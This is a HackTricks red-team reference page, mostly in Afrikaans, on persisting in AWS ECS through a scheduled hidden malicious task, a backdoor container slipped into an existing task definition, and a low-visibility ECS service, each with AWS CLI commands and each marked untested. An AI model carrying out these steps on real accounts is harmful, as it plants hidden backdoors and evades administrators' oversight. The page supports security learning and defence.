AWS - ECS Persistence

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

ECS

Vir meer inligting, kyk na:

AWS - ECS Enum

Versteekte Periodieke ECS-taak

TODO: Toets

'n Aanvaller kan 'n versteekte periodieke ECS-taak skep deur Amazon EventBridge te gebruik om die uitvoering van 'n skadelike taak periodiek te skeduleer. Hierdie taak kan verkenningswerk doen, data eksfiltreer, of volharding handhaaf in die AWS-rekening.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'

Agterdeurhouerhouer in Bestaande ECS Taakdefinisie

TODO: Toets

'n Aanvaller kan 'n heimlike agterdeurhouerhouer byvoeg in 'n bestaande ECS taakdefinisie wat saam met wettige houers uitgevoer word. Die agterdeurhouerhouer kan gebruik word vir volharding en die uitvoer van skadelike aktiwiteite.

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Ongedokumenteerde ECS-diens

TODO: Toets

'n Aanvaller kan 'n ongedokumenteerde ECS-diens skep wat 'n skadelike taak uitvoer. Deur die gewenste aantal take tot 'n minimum te stel en logboekhouding uit te skakel, word dit moeiliker vir administrateurs om die skadelike diens op te merk.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated